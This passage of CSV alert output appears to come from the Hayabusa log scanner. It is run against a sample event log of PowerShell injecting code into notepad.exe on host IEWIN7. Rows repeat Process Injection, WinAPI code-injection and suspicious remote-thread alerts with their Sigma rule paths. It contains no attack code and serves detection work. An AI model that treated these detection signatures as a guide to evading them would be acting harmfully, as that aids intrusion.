Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
